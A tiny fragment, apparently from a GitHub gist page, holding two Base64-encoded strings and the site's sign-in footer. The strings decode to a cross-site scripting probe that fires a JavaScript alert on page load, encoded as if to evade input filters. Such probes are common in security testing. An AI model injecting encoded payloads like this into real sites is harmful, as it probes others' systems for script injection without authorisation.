PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg= | |
PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg== |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment